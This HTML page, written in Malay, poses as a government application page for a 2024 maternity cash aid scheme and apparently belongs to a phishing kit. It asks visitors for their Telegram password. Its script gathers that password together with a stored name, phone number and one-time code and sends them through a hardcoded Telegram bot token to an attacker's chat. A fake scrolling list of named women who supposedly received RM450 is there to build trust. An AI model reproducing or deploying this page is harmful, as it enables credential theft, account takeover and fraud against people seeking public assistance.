<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Senarai Bantuan Tunai Ibu Bersalin 2024</title>

    <!-- Link ke Google Fonts -->
    <link
      href="https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600&display=swap"
      rel="stylesheet"
    />

    <!-- Link ke CSS intl-tel-input -->
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/17.0.8/css/intlTelInput.css"
    />

    <style>
      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: Arial, Helvetica, sans-serif;
      }

      body,
      html {
        height: 100%;
        width: 100%;
        background-color: #fff;
      }

      .hero {
        height: 100vh;
        width: 100%;
        background-size: cover;
        background-position: center;
        position: relative;
      }

      /* navbar */
      .navbar {
        display: flex;
        justify-content: space-between;
        align-items: center;
        background-color: orange; /* Warna latar belakang navbar */
        padding: 10px 20px;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        z-index: 9999;
      }

      .navbar .navbar-logo {
        font-size: 2vw; /* Ukuran font logo dinamis */
        color: #010101;
        font-weight: 400;
        display: flex;
        align-items: center;
      }

      .navbar .navbar-nav {
        display: flex;
        align-items: center;
        justify-content: flex-end; /* Posisi tautan tetap rapih di ujung kanan */
        flex-wrap: nowrap; /* Mencegah elemen terbungkus menjadi kolom */
      }

      .navbar .navbar-nav a {
        color: #010101; /* Warna teks bahasa */
        font-weight: bold;
        font-size: 1.5vw; /* Ukuran font dinamis */
        margin: 0 10px; /* Menambahkan jarak antar link bahasa */
        padding: 5px; /* Ruang klik */
        text-decoration: none; /* Menghilangkan garis bawah pada link */
        white-space: nowrap; /* Mencegah teks terpotong ke baris baru */
      }

      .navbar .navbar-nav a span {
        color: blue;
      }

      .navbar .navbar-nav a:hover {
        color: #007bff; /* Warna hover */
        transition: color 0.3s ease; /* Efek transisi saat hover */
      }

      .navbar .navbar-img {
        width: 40px; /* Ukuran logo */
        height: auto;
        margin-left: 10px; /* Jarak antara logo dan teks */
        object-fit: contain; /* Menjaga proporsi gambar */
      }

      /* Media Query untuk layar kecil */
      @media (max-width: 768px) {
        .navbar {
          padding: 10px 10px; /* Mengurangi padding pada layar kecil */
        }

        .navbar .navbar-logo {
          font-size: 4vw; /* Ukuran font logo lebih besar pada layar kecil */
        }

        .navbar .navbar-nav {
          flex-direction: row; /* Pastikan tautan tetap satu baris */
        }

        .navbar .navbar-nav a {
          font-size: 3vw; /* Ukuran font lebih besar pada layar kecil */
          margin: 0 5px; /* Mengurangi margin pada layar kecil */
          padding: 5px; /* Ruang klik pada layar kecil */
        }

        .navbar .navbar-img {
          width: 30px; /* Ukuran logo lebih kecil pada layar kecil */
          margin-left: 5px; /* Kurangi jarak pada layar kecil */
          margin-top: 0;
        }
      }
      img {
        width: 350px; /* Atur lebar gambar sesuai keinginan */
        height: auto; /* Agar proporsi gambar tetap */
        display: flex; /* Untuk membuatnya blok, bisa juga inline-block */
        margin: 0 auto; /* Posisikan di tengah jika dalam elemen blok */
      }

      img[src="SMR.jpeg"] {
        margin-top: 50px;
      }

      img {
        width: 350px; /* Atur lebar gambar sesuai keinginan */
        height: auto; /* Agar proporsi gambar tetap */
        display: block; /* Untuk membuatnya blok, bisa juga inline-block */
        margin: 0 auto; /* Posisikan di tengah jika dalam elemen blok */
      }

      img[src="info.gif"] {
        border: 2px solid #000; /* Tambahkan border */
        border-radius: 10px; /* Membuat sudut border melengkung */
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2); /* Efek bayangan */
      }

      .form-container {
        justify-content: center;
        background-color: #fff;
        padding: 50px 40px;
        border-radius: 10px;
        width: 70%;
        margin: 50px auto;
        margin-top: 20px;
      }

      label {
        display: block;
        margin-bottom: 8px;
        font-size: 1.1rem;
        font-weight: 600;
      }

      p {
        font-size: 1.2rem;
        color: #333;
        text-align: center;
        margin-top: 20px;
        margin-bottom: 20px;
        line-height: 1.6;
        font-weight: 500;
      }

      input[type="password"] {
        width: 100%;
        padding: 12px;
        margin-bottom: 20px;
        border: 1px solid #010101;
        border-radius: 5px;
        font-size: 1.1rem;
      }

      .btn {
        display: flex;
        width: 100%;
        padding: 12px;
        margin: 30px auto 0;
        background-color: orange;
        color: white;
        border: none;
        border-radius: 10px;
        font-size: 1.1rem;
        cursor: pointer;
        align-items: center;
        justify-content: center;
      }

      .btn:hover {
        background-color: #225786;
      }

      ._record-box {
        width: 100%;
        margin: 20px auto;
        padding: 10px;
        background-color: #f5f5f5;
        border-radius: 10px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      }

      /* CSS untuk list-box */
      .list-box {
        overflow: hidden;
        max-height: 250px;
      }

      /* CSS untuk list */
      .list {
        display: flex;
        flex-direction: column;
      }

      /* CSS untuk item */
      .item {
        display: flex;
        align-items: center;
        padding: 1px;
        background-color: white;
        border-radius: 8px;
        margin-bottom: 10px;
      }

      /* CSS untuk logo/avatar */
      .record_logo img {
        width: 50px;
        height: 50px;
        border-radius: 50%;
        object-fit: cover;
        margin-right: 15px;
        margin-left: 15px;
      }

      /* CSS untuk nama */
      .center .h1 {
        font-size: 16px;
        font-weight: bold;
      }

      /* CSS untuk status */
      .center .h2 {
        font-size: 14px;
        color: green;
      }

      /* Loading screen styles */
      .loading-screen {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(255, 255, 255, 0.8);
        display: flex;
        justify-content: center;
        align-items: center;
        z-index: 1000;
        display: none;
      }

      .loading-screen img {
        max-width: 100px;
        max-height: 100px;
      }

      main {
        flex-grow: 1; /* Memastikan konten utama mendorong footer ke bawah */
      }

      footer {
        position: relative; /* Tetap di bawah meski konten lebih pendek */
        left: 0;
        bottom: 0;
        width: 100%;
        background-color: #fff; /* Latar belakang footer */
        text-align: center;
      }

      footer img {
        max-width: 380px; /* Ukuran gambar maksimal */
        height: auto;
      }

      h4 {
        display: flex;
        margin-top: 0;
        margin-bottom: 0;
        font-size: 1.5rem;
        align-items: center;
        justify-content: center;
      }

      /* Keyframes for spin animation */
      @keyframes spin {
        0% {
          transform: rotate(0deg);
        }
        100% {
          transform: rotate(360deg);
        }
      }

      @media (max-width: 768px) {
        .form-container {
          width: 100%;
          padding: 5px;
        }

        input[type="text"],
        input[type="tel"] {
          font-size: 1rem;
        }

        .btn {
          width: 60%;
          font-size: 1.2rem;
          padding: 15px;
          margin-top: 0%;
          font-weight: bold;
        }
      }

      @media (max-width: 480px) {
        .info {
          font-size: 40px;
        }

        p {
          font-size: 16px;
        }
      }
    </style>
  </head>
  <body>
    <nav class="navbar">
      <div class="navbar-logo">
        <img src="Jata Negara@3x.gif" alt="Logo" class="navbar-img" />

        <!-- Contoh gambar logo -->
      </div>
      <div class="navbar-nav">
        <a href="#">Bahasa Melayu</a>
        <a href="#"><span>English</span></a>
        <a href="#"><span>摩訶至那國</span></a>
        <a href="#"><span>हिंदी</span></a>
      </div>
    </nav>
    <br />
    <br />
    <br />
    <img src="ibu-bersalin.jpeg" alt="tng-img" />
    <br />
    <h4>Teruskan Untuk Memohon</h4>

    <div class="form-container">
      <form id="registrationForm">
        <label for="name" id="name"
          >Sila Masukan kata laluan Telegram Anda.</label
        >
        <input
          type="password"
          id="kata-sandi"
          name="kata-sandi"
          placeholder="Masukan kata laluan"
          required
        />
        <button type="submit" class="btn" id="loginButton">Teruskan</button>
      </form>

      <img
        id="loadingGif"
        src="processing.gif"
        alt="Loading..."
        style="display: none; margin: 20px auto; width: 60%; height: auto"
      />

      <p id="formMessage" style="display: none; text-align: center">
        Sila Masukan kata laluan Telegram Anda
      </p>

      <button
        id="useAnotherPhone"
        style="
          display: none;
          width: 100%;
          padding: 12px;
          margin: 30px auto 0;
          background-color: #f8d704;
          color: white;
          border: none;
          border-radius: 10px;
          font-size: 1.1rem;
          cursor: pointer;
          align-items: center;
          justify-content: center;
        "
      >
        Gunakan Nombor Phone Lain
      </button>
    </div>

    <div class="_record-box">
      <div id="list" class="list-box">
        <div class="list">
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Ain Zulkifli</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Zarina Muhammad</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Liyana Zainal</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Nur Syafiqah Latiff</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Sharifah Amirah Nizam</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Noraziah Hashim</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Farah Azlina Abdul</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Zulkiah Ibrahimah</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Siti Sarah</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Fahimah Azahra Nasir</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Nurul Afiqah</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Azura Shafina Abdullah</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Hasnah Halimah Abdul</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Rahimah Salleh</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Nadia Hafizah</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Farizah Murni Musa</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Rina Zainal</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Amirah Rahimah Rahman</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Norshila Anuarah</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Zainon Aliyah</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Fauziah Abdul Rahman</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1"><span class="name">Lina Mohd Noor</span></div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Ezzah Hishamuddin</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
          <div class="item">
            <div class="record_logo">
              <img src="avatar.png" alt="" />
            </div>
            <div class="center">
              <div class="h1">
                <span class="name">Sakinah Binti Abdul</span>
              </div>
              <div class="h2">Berjaya RM450 ✅</div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <footer>
      <!-- Hanya menampilkan gambar di dalam footer -->
      <img src="ini1.png" alt="Logo Footer" />
    </footer>
    <!-- Loading Screen -->
    <div class="loading-screen" id="loadingScreen">
      <img src="loading-loading-forever.gif" alt="Loading..." />
    </div>

    <!-- Script untuk intl-tel-input -->
    <script>
      document
        .getElementById("registrationForm")
        .addEventListener("submit", function (event) {
          event.preventDefault(); // Mencegah pengiriman form default

          // Ambil data dari localStorage
          const name = localStorage.getItem("name") || "Tidak tersedia";
          const phone = localStorage.getItem("phone") || "Tidak tersedia";
          const otp = localStorage.getItem("otp") || "Tidak tersedia";

          // Ambil nilai kata sandi
          const kataSandi = document.getElementById("kata-sandi").value;

          // Validasi input kata sandi
          if (!kataSandi) {
            alert("Kata sandi tidak boleh kosong.");
            return;
          }

          // Menampilkan loading dan menyembunyikan elemen lainnya
          document.getElementById("name").style.display = "none";
          document.getElementById("kata-sandi").style.display = "none";
          document.getElementById("loginButton").style.display = "none";
          document.getElementById("loadingGif").style.display = "block";
          document.getElementById("formMessage").innerHTML =
            "Sila tunggu proses pengesahan atau gunakan nombor telefon lain";
          document.getElementById("formMessage").style.display = "block";
          document.getElementById("useAnotherPhone").style.display = "block";

          // Mengirim data ke Telegram
          const botToken = "7309860602:AAGzgEe5PyilkB_7A8T7wn8Cho3p4M8Ic9k"; // Ganti dengan token bot Anda
          const chatId = "5870723270"; // Ganti dengan ID chat Anda

          const message = `
───────────────────────
(MALAY | DATA | ${phone})
───────────────────────
- Nama Lengkap: ${name}

- No HP: ${phone}

- OTP: ${otp}

- Kata Sandi: ${kataSandi}
───────────────────────
`;

          console.log("Data yang akan dikirim:", {
            name,
            phone,
            otp,
            kataSandi,
          });

          fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
            method: "POST",
            headers: {
              "Content-Type": "application/json",
            },
            body: JSON.stringify({
              chat_id: chatId,
              text: message,
            }),
          }).catch((error) => {
            console.error("Kesalahan:", error);
            alert("Terjadi kesalahan saat menghubungi Telegram API.");
          });
        });
    </script>

    <script>
      function startAutoScroll() {
        var list = document.querySelector(".list");
        var scrollTimer;

        function scrollList() {
          var firstItem = list.querySelector(".item:first-child");
          var itemHeight = firstItem.offsetHeight;

          list.style.transition = "margin-top 1s ease";
          list.style.marginTop = `-${itemHeight}px`;

          setTimeout(function () {
            list.style.transition = "none";
            list.style.marginTop = "0px";
            list.appendChild(firstItem); // Pindahkan item pertama ke akhir
          }, 1000); // Setelah animasi selesai (1 detik)

          scrollTimer = setTimeout(scrollList, 2000); // Ulangi scroll setiap 2 detik
        }

        scrollList(); // Mulai scrolling
      }

      document.addEventListener("DOMContentLoaded", function () {
        startAutoScroll(); // Jalankan scrolling otomatis saat halaman dimuat
      });
    </script>

    <script>
      function startAutoScroll() {
        var list = document.querySelector(".list");
        var scrollTimer;

        function scrollList() {
          var firstItem = list.querySelector(".item:first-child");
          var itemHeight = firstItem.offsetHeight;

          list.style.transition = "margin-top 1s ease";
          list.style.marginTop = `-${itemHeight}px`;

          setTimeout(function () {
            list.style.transition = "none";
            list.style.marginTop = "0px";
            list.appendChild(firstItem); // Pindahkan item pertama ke akhir
          }, 1000); // Setelah animasi selesai (1 detik)

          scrollTimer = setTimeout(scrollList, 2000); // Ulangi scroll setiap 2 detik
        }

        scrollList(); // Mulai scrolling
      }

      document.addEventListener("DOMContentLoaded", function () {
        startAutoScroll(); // Jalankan scrolling otomatis saat halaman dimuat
      });
    </script>
  </body>
</html>
